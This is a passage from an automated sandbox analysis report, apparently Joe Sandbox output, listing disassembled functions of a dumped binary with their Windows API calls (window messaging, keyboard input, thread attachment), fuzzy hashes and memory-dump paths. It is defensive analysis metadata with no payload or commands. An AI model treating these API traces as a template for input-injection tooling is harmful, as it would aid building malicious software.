                                                                                                                                • API String ID: 724789610-0
                                                                                                                                • Opcode ID: 236552534fd3f73313330fc495358b2336db50a6358c4e7015eb2feb01971ef0
                                                                                                                                • Instruction ID: 036871908b00ff5bbc6c5f806c8ec43b01032e46137df183587fffb6b55783ef
                                                                                                                                • Opcode Fuzzy Hash: 236552534fd3f73313330fc495358b2336db50a6358c4e7015eb2feb01971ef0
                                                                                                                                • Instruction Fuzzy Hash: 61E0E5332042146BC320EA74EC05AABB799BF85720F14871ABDA4872C1DA30DC14D3C1
                                                                                                                                Function 00F13E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00F134E2,?,00000001), ref: 00F13E6D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                • Opcode ID: fa1d1610efee9f90f33868ef8576c67dc156edd60e03ee2f6e8ba434ff5c4866
                                                                                                                                • Instruction ID: 9c5b497ee48ea0ede43fba9626e63633ebae52cf1c17cffae20eb8e697f5c424
                                                                                                                                • Opcode Fuzzy Hash: fa1d1610efee9f90f33868ef8576c67dc156edd60e03ee2f6e8ba434ff5c4866
                                                                                                                                • Instruction Fuzzy Hash: DEF039B6501752CFDB349F64D8A0897BBE0AF157253248A3EE1D682621C731A988EF00
                                                                                                                                Function 00F579F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00F57A11
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FolderPath_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3334745507-0
                                                                                                                                • Opcode ID: 778f778207ebfd26b40ca962d434267914bd5442728e0a5d6731cf04a46b447d
                                                                                                                                • Instruction ID: 1957fdaf264c5a58c2da29144d13b5d25e3585ca4b8eff14ae9207830cffed20
                                                                                                                                • Opcode Fuzzy Hash: 778f778207ebfd26b40ca962d434267914bd5442728e0a5d6731cf04a46b447d
                                                                                                                                • Instruction Fuzzy Hash: 79D05EA650022C2FDB54E7289C09DFB36ADC744104F0002A1786DD2042E924AE858BE0
                                                                                                                                Function 00F56852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F56623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00F5685E,?,?,?,00F84A5C,00FAE448,00000003,?,?), ref: 00F566E2
                                                                                                                                • WriteFile.KERNEL32(?,?,00FD22E8,00000000,00000000,?,?,?,00F84A5C,00FAE448,00000003,?,?,00F14C44,?,?), ref: 00F5686C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$PointerWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 539440098-0
                                                                                                                                • Opcode ID: b7904a6d190bd64220e934cea02dbfdfd4b46bdd3972b17b8bd8da86a75a7645
                                                                                                                                • Instruction ID: 6884d813cb87f81aaef388a64f18ab7bfd284eb993f299ab6b2a286a41d836ca
                                                                                                                                • Opcode Fuzzy Hash: b7904a6d190bd64220e934cea02dbfdfd4b46bdd3972b17b8bd8da86a75a7645
                                                                                                                                • Instruction Fuzzy Hash: FDE04636000208BBDB20AF94DC01A8ABBB8EB04314F10051AF94196010D7B5AA18EBA0
                                                                                                                                Function 00F1193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F11952
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendTimeout
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1599653421-0
                                                                                                                                • Opcode ID: 8ea0957950613678b3ceea9235fd65cae2e2a025784b4f5d3781d8fe73176601
                                                                                                                                • Instruction ID: 0eb29712b52a296ce9fbadbe3d3d1c63f5766320329fbeeced6e9c8d557d5835
                                                                                                                                • Opcode Fuzzy Hash: 8ea0957950613678b3ceea9235fd65cae2e2a025784b4f5d3781d8fe73176601
                                                                                                                                • Instruction Fuzzy Hash: F0D012F169420C7EFB008761CD07DBB775CD721F81F1046617E06D64D1D6659E099570
                                                                                                                                Function 00F4E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F11952
                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F4E3AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1777923405-0
                                                                                                                                • Opcode ID: 0991cc6e173ea1ff32d03daee34da9abbe32ca592f73a2c05a0acf955f48f6fa
                                                                                                                                • Instruction ID: f27124749133f1e4e008c1b586b8b0778c527c3af00b9f92b1bef92f2375c805
                                                                                                                                • Opcode Fuzzy Hash: 0991cc6e173ea1ff32d03daee34da9abbe32ca592f73a2c05a0acf955f48f6fa
                                                                                                                                • Instruction Fuzzy Hash: 4ED01231654110AAFA716F24FC06FD17BA2AB40750F21045AB580670E5C6D25C816540
                                                                                                                                Function 00F66FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: 13055241e47869244069c9cc7d0a2b617611fc81bda18e6f2f07ba7415db380e
                                                                                                                                • Instruction ID: bbaaadd88b2e7e5e5b0dc288739f9e37ae80e1e01eb17519a40a5d34dc079fc4
                                                                                                                                • Opcode Fuzzy Hash: 13055241e47869244069c9cc7d0a2b617611fc81bda18e6f2f07ba7415db380e
                                                                                                                                • Instruction Fuzzy Hash: BFD09E362105189FC701EF99DD44C8677E9FF4D7503018052F50ADB231DA21FC51AB90
                                                                                                                                Function 00F14FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00F849DA,?,?,00000000), ref: 00F14FC4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: cc84c38187ca90a222e3b8dbecd96c10f3fecc06a04448561f2c4be53f0e65a6
                                                                                                                                • Instruction ID: f3c4377c6d66dacc8d6204e4c74be1b141d7b1285c7db13c30ad2e0e1f75ca2a
                                                                                                                                • Opcode Fuzzy Hash: cc84c38187ca90a222e3b8dbecd96c10f3fecc06a04448561f2c4be53f0e65a6
                                                                                                                                • Instruction Fuzzy Hash: ABD0C97464020CBFEB00CB90DC46F9A7BBCEB04758F200195F600A62D0D2F2BE809B55
                                                                                                                                Function 00F84DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: 14cf9dbd3f258a40bc0716915fa4841feb7930fa7704ac106b39f3a53da4ddd6
                                                                                                                                • Instruction ID: 69b7dac0891196f429ffb9f5be28f012be978042b1a67c5ce220d3995f849a33
                                                                                                                                • Opcode Fuzzy Hash: 14cf9dbd3f258a40bc0716915fa4841feb7930fa7704ac106b39f3a53da4ddd6
                                                                                                                                • Instruction Fuzzy Hash: E2D0C9B1500210DBE730AF69F80474AB7E4AF40350F24882AEDC686155D7BAA8C2AB16
                                                                                                                                Function 00F150EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00F150BE,?,00F15088,?,00F1BE3D,00FD22E8,?,00000000,?,00F13E2E,?,00000000,?), ref: 00F1510C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                • Opcode ID: a3bef55ee9f1451687e7c082957622083253c799a8886e0da7683a05a1dae61e
                                                                                                                                • Instruction ID: 964f2a354899e61196ac8db171a5fb4c9676cf7e715aa7a53d747212933efee8
                                                                                                                                • Opcode Fuzzy Hash: a3bef55ee9f1451687e7c082957622083253c799a8886e0da7683a05a1dae61e
                                                                                                                                • Instruction Fuzzy Hash: 62E0B676804B02DBC2354F1AE804452FBF5FFE57713218A2FD0E582660D7B0548AEB90

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00F7F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00F7F64E
                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7F6AD
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F7F6EA
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7F711
                                                                                                                                • SendMessageW.USER32 ref: 00F7F737
                                                                                                                                • _wcsncpy.LIBCMT ref: 00F7F7A3
                                                                                                                                • GetKeyState.USER32(00000011), ref: 00F7F7C4
                                                                                                                                • GetKeyState.USER32(00000009), ref: 00F7F7D1
                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7F7E7
                                                                                                                                • GetKeyState.USER32(00000010), ref: 00F7F7F1
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7F820
                                                                                                                                • SendMessageW.USER32 ref: 00F7F843
                                                                                                                                • SendMessageW.USER32(?,00001030,?,00F7DE69), ref: 00F7F940
                                                                                                                                • SetCapture.USER32(?), ref: 00F7F970
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00F7F9D4
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F7F9FA
                                                                                                                                • ReleaseCapture.USER32 ref: 00F7FA05
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F7FA3A
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00F7FA47
                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7FAA9
                                                                                                                                • SendMessageW.USER32 ref: 00F7FAD3
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7FB12
                                                                                                                                • SendMessageW.USER32 ref: 00F7FB3D
                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F7FB55
                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F7FB60
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F7FB81
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00F7FB8E
                                                                                                                                • GetParent.USER32(?), ref: 00F7FBAA
                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7FC10
                                                                                                                                • SendMessageW.USER32 ref: 00F7FC40
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00F7FC96
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F7FCC2
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7FCEA
                                                                                                                                • SendMessageW.USER32 ref: 00F7FD0D
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00F7FD57
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F7FD87
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F7FE1C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                • API String ID: 3461372671-4164748364
                                                                                                                                • Opcode ID: 77830d308e51b2a08e5e2d661bfd9d4b0e5955e196c223201799a2704ff539b2
                                                                                                                                • Instruction ID: 62f6d3c23ff7b9c964b4d3e1ffac72577c41cd766fd2052849a73bc6b6207167
                                                                                                                                • Opcode Fuzzy Hash: 77830d308e51b2a08e5e2d661bfd9d4b0e5955e196c223201799a2704ff539b2
                                                                                                                                • Instruction Fuzzy Hash: 4232E071A04205AFD720DF64CC84EAABBE5FF48324F14852AFA59872B1D731DD48EB52
                                                                                                                                Function 00F7A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F7AFDB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                                • Opcode ID: 868a809fdedae366891195f0e3836f10942ad2da195e890625c9c9e77fa5bee1
                                                                                                                                • Instruction ID: 6499cc6c8c2597790fdc2057c8b3e13023e7951bbaa07723b128f390106c6956
                                                                                                                                • Opcode Fuzzy Hash: 868a809fdedae366891195f0e3836f10942ad2da195e890625c9c9e77fa5bee1
                                                                                                                                • Instruction Fuzzy Hash: C412C171904208ABEB259F64CC49FAE7BB8EFC5720F11821BF519DB2D1DB748941EB12
                                                                                                                                Function 00F2F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 00F2F796
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F84388
                                                                                                                                • IsIconic.USER32(000000FF), ref: 00F84391
                                                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00F8439E
                                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00F843A8
                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F843BE
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F843C5
                                                                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F843D1
                                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F843E2
                                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F843EA
                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F843F2
                                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00F843F5
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8440A
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00F84415
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8441F
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00F84424
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8442D
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00F84432
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8443C
                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00F84441
                                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00F84444
                                                                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F8446B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
